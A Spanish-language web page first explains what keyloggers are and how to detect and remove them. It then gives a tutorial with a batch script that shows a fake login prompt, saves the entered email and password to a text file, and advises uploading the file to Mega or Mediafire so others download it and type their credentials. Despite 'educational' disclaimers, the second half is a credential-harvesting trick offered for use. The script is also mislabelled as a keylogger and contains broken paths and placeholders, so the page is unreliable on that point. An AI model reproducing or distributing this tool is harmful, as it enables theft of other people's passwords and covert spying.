top of page

Keylogger
¿Qué es un keylogger?
Un keylogger es un software o hardware que puede interceptar y guardar las pulsaciones realizadas en el teclado de un equipo que haya sido infectado. Este malware se sitúa entre el teclado y el sistema operativo para interceptar y registrar la información sin que el usuario lo note.
Es decir, que si sin querer te descargas un malware disfrazado (que creéis que os estáis descargando un archivo de por ejemplo un juego, pero contiene un virus), ese malware, puede ser instalado en vuestro dispositivo. Y que quiere decir eso, que cuando valláis a poner una de vuestras claves privadas, el virus instalado en vuestro ordenador o portátil, lo guardará, y la persona que está detrás de todo esto, lo sabrá.
Un keylogger también puede ser instalado o registrado en vuestro dispositivo por una persona que vosotr@s conozcáis. Es decir que si algún familiar vuestro sospecha de vosotros/as, puede instalar un keylogger para saber que buscáis, que escribís...
¿Cómo detectar un keylogger?
Detectar un keylogger no es una tarea fácil, ya que están diseñados para permanecer ocultos. No obstante, existen algunas señales que pueden indicarnos si estamos siendo afectados por alguno – entre estas señales podemos mencionar navegación web más lenta de lo habitual, movimiento del mouse o pulsaciones de teclado tardan en aparecer en la pantalla cuando escribes o errores al cargar gráficos o páginas web.
¿Cómo eliminar un keylogger?
Intentar buscar manualmente cualquier software oculto dentro tu computadora y eliminarlo puede tomar mucho tiempo y puede que no se logre. La mejor manera de deshacerse de los keyloggers es utilizar software anti-keylogger, tal como el que se encuentra en algunos antivirus, haciendo uso de estos puedes analizar tu sistema para el encontrar el software malicioso y eliminarlo.
-
Yo sé crear un keylogger, y lo veréis ahora, pero no recomiendo usarlo para usos de espiar a los demás. No me hago cargo del mal uso que se le pueda llegar a dar. Yo lo enseño con fines educativos.
¿Cómo crear un keylogger utilizando el bloc de notas?
Después de haber dicho que es un keylogger, toca explicaros su creación.
Por cierto, utilizar un keylogger en equipos ajenos constituye un delito, lo que puede acarrear penas por la ley. Utilízalo solo para fines educativos y en computadoras propias. No me responsabilizo del mal uso que otras personas le puedan dar.
1. Primer paso: Copia el código que os voy a dejar abajo y pégalo en el block de notas:
@echo off
color a
title Keylogger
cls
echo Por favor ingresa tu correo y contraseña
echo.
echo.
cd “C:Logs”
set /p user=Usuario:
set /p pass=Contraseña:
echo Usuario =”%user%” Contraseña =”%pass%” >> Registro.txt
start >>Program Here<<
exit
2. Segundo paso: Click-a arriba a la derecha del block de notas donde pone archivo, y dale a guardar cómo. Nómbralo así: comotuquieras.bat
Da igual lo que ponga antes de .bat, pero que termine así.
3. Tercer paso: Compresión y visión
Recomiendo comprimirlo en WinRar y colgarlo en mega o en mediafire. Cuando la gente lo descargue y ponga sus datos, en tu escritorio, aparecerá un archivo llamado Registro.txt, donde aparecerá lo registrado. El archivo Registro.txt se irá actualizando.
Si le dejas tu ordenador a una persona, debes esconder este archivo en alguna carpeta. Cuando termine de hacer lo que sea que ha hecho, te aparecerá su recorrido.
______________________________________________________________________________________________________________________________________
Parte de la información ha sido extraída de 1000tipsinformaticos
bottom of page